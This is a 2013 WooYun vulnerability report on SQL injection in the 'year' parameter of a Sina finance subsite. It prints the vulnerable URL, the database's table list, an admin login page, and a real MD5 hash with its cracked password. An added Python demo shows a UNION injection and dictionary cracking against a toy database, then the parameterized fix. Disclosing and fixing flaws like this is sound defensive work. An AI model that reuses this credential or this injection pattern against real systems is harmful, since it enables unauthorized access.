
Vulnerability Summary

Defect ID: wooyun-2013-041618

Title: SQL injection vulnerability on a Sina subsite

Vendor: Sina

Author: xiaoL

Submitted: 2013-11-01 08:12

Fixed: 2013-12-16 08:13

Published: 2013-12-16 08:13

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2013-11-01: Details sent to the vendor, awaiting vendor handling
2013-11-01: Vendor confirmed; details disclosed to the vendor only
2013-11-11: Details disclosed to core white hats and relevant domain experts
2013-11-21: Details disclosed to regular white hats
2013-12-01: Details disclosed to intern white hats
2013-12-16: Details disclosed to the public

Brief description:

SQL injection on a Sina subsite...
There are also some messy pages lying around, and...

Detailed description:

http://biz.finance.sina.com.cn//meeting/showAllMeeting.php?year=2012
The injection point is the `year` parameter of the URL above...

(screenshot: 1.jpg)


web application technology: Apache
back-end DBMS: MySQL 5
Database: biz
[383 tables]
+---------------------------------+
| CBCM_1 |
| CBCM_2 |
| CBCM_join |
| C_Exhi |
| StockRadarHistory |
| StockRadarMsg |
| TB_OBJECT_1010 |
| TB_OBJECT_1014 |
| TB_OBJECT_1016 |
| TB_OBJECT_1017 |
| TB_OBJECT_1018 |
| TB_OBJECT_1020 |
| TB_OBJECT_1021 |
| TB_OBJECT_1022 |
| TB_OBJECT_1023 |
| TB_OBJECT_1024 |
| TB_OBJECT_1039 |
| TB_OBJECT_1040 |
| TB_OBJECT_1070 |
| TB_OBJECT_1079 |
| TB_OBJECT_1084 |
| TB_OBJECT_1090 |
| TB_OBJECT_1091 |
| TB_OBJECT_1092 |
| TB_OBJECT_1093 |
| TB_OBJECT_1095 |
| TB_OBJECT_1099 |
| TB_OBJECT_1100 |
| TB_OBJECT_1101 |
| TB_OBJECT_1102 |
| TB_OBJECT_1103 |
| TB_OBJECT_1104 |
| TB_OBJECT_1114 |
| TB_OBJECT_1115 |
| TB_OBJECT_1125 |
| TB_OBJECT_1126 |
| TB_OBJECT_1127 |
| TB_OBJECT_1135 |
| TB_OBJECT_1136 |
| TB_OBJECT_1142 |
| TB_OBJECT_1143 |
| TB_OBJECT_1149 |
| TB_OBJECT_1151 |
| TB_OBJECT_1156 |
| TB_OBJECT_1158 |
| TB_OBJECT_1180 |
| TB_OBJECT_1214 |
| TB_OBJECT_1233 |
| TB_OBJECT_1245 |
| TB_OBJECT_1259 |
| TB_OBJECT_1260 |
| TB_OBJECT_1261 |
| TB_OBJECT_1272 |
| TB_OBJECT_1373 |
| TB_OBJECT_1399 |
| TB_OBJECT_1400 |
| TB_OBJECT_1402 |
| TB_OBJECT_1415 |
| TB_OBJECT_1426 |
| TB_OBJECT_1449 |
| TB_OBJECT_1673 |
| TB_OBJECT_1686 |
| TB_OBJECT_1714 |
| TB_OBJECT_1715 |
| aask_query |
| aask_teach |
| aask_tip |
| aba_info |
| aba_list |
| achieve_forecast |
| art_product |
| art_promulgator |
| asset_flow |
| bs_info |
| bs_intro |
| bs_news |
| bs_people_relation |
| bs_subsidiary_info |
| cffex_company |
| cffex_trade |
| cfjy |
| cgs_price |
| cgs_vote |
| cnpinyin |
| cnstock |
| coindaily |
| coininfo |
| coinquote |
| corporation |
| currencies |
| daily |
| data_close_info |
| data_hight_close_info |
| data_hsl |
| data_low_close_info |
| data_ltsz |
| data_lxzd |
| data_syl |
| data_talk |
| data_volume_five |
| data_zhsl |
| data_zzd |
| data_zzf |
| dict_hit |
| dict_user |
| dict_words |
| donation |
| dpool_check_db |
| dpps_host_backend_reg |
| dpps_loginlog |
| dpps_schedule |
| dpps_user |
| exhibition |
| finance_blogs |
| finance_event |
| finance_event_new |
| fltxsg |
| fltxsg2 |
| fltxsg3 |
| focus_everyday |
| forex |
| forexask_query |
| forexask_teach |
| forexask_tip |
| fq_daily |
| fu_ask_query |
| fu_ask_teach |
| fu_ask_tip |
| fund_huaxia |
| fund_info |
| fund_net_asset_value |
| fund_result |
| fundpre_corr_para |
| fundpre_corr_zhishu |
| fundpre_prof_info |
| future_info |
| futures_companyinfo |
| futures_trade |
| futures_trade_archive |
| futuresdaily |
| futureshq |
| futurestable |
| hf_admins |
| hf_photo |
| hf_users |
| hkstock |
| hkwarrant_data |
| hkwarrant_historical_data |
| hqtree |
| hqtree_admin |
| hqtree_del |
| hqtree_symbols |
| investment_concept |
| investment_future_reports |
| investment_hot |
| investment_indu_fcst |
| investment_induresearch_reports |
| investment_industrycare |
| investment_industrycare_gti |
| investment_macmorning_reports |
| investment_orgcare |
| investment_orgcare_distribution |
| investment_orgcare_gti |
| investment_pft |
| investment_rating |
| investment_rating_daily |
| investment_rating_daily_gti |
| investment_rating_gti |
| investment_rating_unstock |
| investment_reports |
| investment_strategy_reports |
| investment_sumprice |
| investment_sumprice_gti |
| investment_sumrating |
| investment_sumrating_gti |
| large_trade |
| lc_admin |
| lc_quest |
| lc_quests |
| lcmj |
| lipper |
| loofi_credit_card |
| luyan |
| market_size |
| media_data |
| meeting2_area |
| meeting2_city |
| meeting2_company_news |
| meeting2_event |
| meeting2_guest |
| meeting2_guest_news |
| meeting2_guest_pic |
| meeting2_guest_video |
| meeting2_news |
| meeting2_pic |
| meeting2_rbac |
| meeting2_rela_guest |
| meeting2_subject |
| meeting2_subject_guest1 |
| meeting2_subject_guest2 |
| meeting2_subject_keyword |
| meeting2_subject_news |
| meeting2_subject_org |
| meeting2_subject_pic |
| meeting2_subject_suborg |
| meeting2_subject_video |
| meeting2_underway |
| meeting2_video |
| meeting_guest |
| meeting_keyword |
| meeting_news |
| meeting_pic |
| meeting_rbac |
| meeting_rela_guest |
| meeting_subject |
| meeting_subject_guest1 |
| meeting_subject_guest2 |
| meeting_subject_org |
| meeting_subject_suborg |
| meeting_video |
| mergepeople |
| mobile |
| morning_reports_gxq |
| mscfjys |
| mslcmj |
| my_stock |
| news_mod_1 |
| news_mod_2 |
| news_mod_3 |
| news_mod_4 |
| news_mod_5 |
| news_mod_6 |
| news_mod_7 |
| news_mod_7_t |
| news_through |
| openfund |
| par_t255 |
| person_contribution |
| person_honor |
| person_main |
| person_main_book |
| person_news_fetch |
| person_news_num |
| person_organization |
| person_position |
| person_to_book |
| person_to_honor |
| person_to_org_and_pos |
| person_to_organization |
| person_to_position |
| person_top_news |
| pickup |
| player |
| put_select |
| put_select_wz |
| qmx_analystinfo |
| qmx_analystinfo_gti |
| qmx_analystorder |
| qmx_analystreports |
| qmx_eps |
| qmx_industry |
| qmx_industrystock |
| qmx_pe |
| qmx_reports |
| qmx_reports_gti |
| qmx_reports_summary_gti |
| qs |
| qsyyb |
| radar |
| relanews_all |
| relanews_ggdp |
| relanews_hydt |
| relanews_hyzx |
| relanews_mggs |
| relanews_sccw |
| relanews_xgpl |
| relanews_xgxw |
| remark |
| report_baogao |
| report_chanpin |
| report_chanpin_charge |
| report_dinggou |
| report_jigou |
| report_pic |
| report_sinauser |
| sdc_account |
| sdc_account2 |
| sp_t101 |
| sp_t106 |
| sp_t110 |
| sp_t122 |
| sp_t123 |
| sp_t124 |
| sp_t148 |
| sp_t156 |
| sp_t157 |
| sp_t158 |
| sp_t159 |
| sp_t160 |
| sp_t161 |
| sp_t162 |
| sp_t163 |
| sp_t164 |
| sp_t165 |
| sp_t166 |
| sp_t167 |
| sp_t168 |
| sp_t191 |
| sp_t236 |
| sp_t241 |
| sp_t246 |
| sp_t253 |
| sp_t255 |
| sp_t260 |
| sp_t265 |
| sp_t273 |
| sp_t279 |
| sp_t289 |
| sp_t45 |
| sp_t82 |
| sp_t95 |
| stamphistory |
| stampquote |
| stkrcmd_account |
| stkrcmd_con |
| stkrcmd_modify |
| stkrcmd_stock |
| szwtest |
| tb_BalanceSheet_Bank |
| tb_BalanceSheet_NonBank |
| tb_CPI |
| tb_CompanyProfile |
| tb_DJ |
| tb_EarningAnnouncement |
| tb_FinetNews |
| tb_GDP |
| tb_IPO |
| tb_IPOPro |
| tb_IncomeStatment_Bank |
| tb_IncomeStatment_NonBank |
| tb_Prospects |
| tb_RedChipsNews |
| tb_Research |
| tb_Retail |
| tb_Review |
| tb_SehkNews |
| tb_Trade |
| tb_Unemployment |
| tb_WorldwideIndex |
| tb_companyList |
| tb_daily |
| tb_yanbao |
| tb_yanbao_attr |
| teach |
| teach_bak |
| team |
| tech_spt253 |
| the_query |
| the_query_bak |
| topten_prepare |
| tt_double_data |
| tt_index |
| tt_multi_data |
| twstock |
| us_stock_recommend |
| usask |
| usask_black |
| usstock2 |
| usstock_blogs |
| usstock_blogs_auditing |
| usstock_news |
| zhuanlan |
| zjzt_answer |
| zjzt_answer_new |
| zjzt_black |
| zjzt_expert |
| zjzt_forex_answer |
| zjzt_forex_question |
| zjzt_question |
| zjzt_question_new |
| zjzt_tip |
| zjzt_us_answer |
| zjzt_us_question |
+---------------------------------+
A side question:
http://biz.finance.sina.com.cn/lc/detail.php?id=47499
What is going on with ids 47497 - 47499?

(screenshot: 2.png)


http://biz.finance.sina.com.cn/ask/power.php
A login page?
There is also an expert login page, but I am not an expert, so I left it alone!

Proof of vulnerability:

As above...
The MD5 hash can be cracked:
0d3e67b6219bf17bc56c2dc792922ba2
123admin!@#

Suggested fix:

Filter the input!
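The report stops at "filter the input"; the durable fix for the `year` parameter is to validate its type and bind it as a query parameter, so the request can never change the shape of the SQL. The following is an added example, not code from the original report or from Sina: it rebuilds the `showAllMeeting.php?year=...` pattern on an in-memory sqlite3 database so it runs offline, shows a UNION payload pulling an unsalted MD5 admin hash out of a second table through the concatenated query, shows the same payload doing nothing against the validated/parameterized version, and finishes with the dictionary lookup that is all "MD5 can be cracked" requires. The table names (`meetings`, `admin_users`), the sample rows, the sample password and the wordlist are all constructed assumptions, not the real `biz` schema or the real hash.

```python
# Added example, not part of the original WooYun report or of Sina's code.
# Models the showAllMeeting.php?year=... pattern on in-memory sqlite3 so it
# runs offline. Table names, sample rows, sample credential and wordlist are
# constructed assumptions; none of them is the real biz schema or real data.
import hashlib
import sqlite3
from typing import List, Optional

SAMPLE_PASSWORD = "P@ssw0rd"                                      # constructed
SAMPLE_HASH = hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()   # unsalted MD5
WORDLIST = ["123456", "admin", "password", "P@ssw0rd", "letmein"]  # constructed

# The page selects two columns (id, title), so a UNION payload needs exactly two.
UNION_PAYLOAD = "2012 UNION SELECT username, password_md5 FROM admin_users"


def build_db() -> sqlite3.Connection:
    """Toy schema: a meetings table plus an admin table storing unsalted MD5."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE meetings (id INTEGER PRIMARY KEY, year INTEGER, title TEXT);
        CREATE TABLE admin_users (id INTEGER PRIMARY KEY,
                                  username TEXT, password_md5 TEXT);
        INSERT INTO meetings (year, title) VALUES
            (2011, 'Forum 2011'), (2012, 'Summit 2012'), (2013, 'Expo 2013');
        """
    )
    conn.execute(
        "INSERT INTO admin_users (username, password_md5) VALUES (?, ?)",
        ("admin", SAMPLE_HASH),
    )
    conn.commit()
    return conn


def show_all_meetings_vulnerable(conn: sqlite3.Connection, year: str) -> List[tuple]:
    """The bug class in the report: the request parameter is pasted into the SQL text."""
    sql = "SELECT id, title FROM meetings WHERE year = " + year
    return conn.execute(sql).fetchall()


def show_all_meetings_fixed(conn: sqlite3.Connection, year: str) -> List[tuple]:
    """Validate the type, then bind the value; the parameter cannot alter the query."""
    try:
        year_int = int(year)      # a year is an integer; anything else is rejected
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title FROM meetings WHERE year = ?", (year_int,)
    ).fetchall()


def leaked_credentials(conn: sqlite3.Connection) -> List[tuple]:
    """End to end: the UNION payload returns admin rows alongside meeting rows."""
    rows = show_all_meetings_vulnerable(conn, UNION_PAYLOAD)
    # rows whose first column is not an integer id came from admin_users
    return [(user, pw) for user, pw in rows if not isinstance(user, int)]


def crack_md5(target_hex: str, wordlist: List[str]) -> Optional[str]:
    """Why 'MD5 can be cracked': unsalted MD5 falls to a plain dictionary lookup."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    db = build_db()
    print("normal request:  ", show_all_meetings_vulnerable(db, "2012"))
    print("injected request:", show_all_meetings_vulnerable(db, UNION_PAYLOAD))
    for user, md5_hex in leaked_credentials(db):
        print(f"cracked {user}: {crack_md5(md5_hex, WORDLIST)}")
    print("fixed + injected:", show_all_meetings_fixed(db, UNION_PAYLOAD))
```

The fixed function rejects the payload before it ever reaches the database, and the bound parameter would stay data even if validation were skipped; "filtering" alone (blacklisting quotes or keywords) is what the concatenated version invites attackers to bypass. The same shape applies to the original PHP: cast `$_GET['year']` to an integer and use a PDO or mysqli prepared statement, and replace unsalted MD5 for stored admin passwords with a salted, slow hash so a leaked table does not turn into a login.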

Copyright notice: when reproducing, please credit the source: xiaoL@WooYun


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2013-11-01 11:07

Vendor reply:

Thank you for your attention to Sina security; we will arrange for the relevant staff to fix this immediately.

Latest status:

None

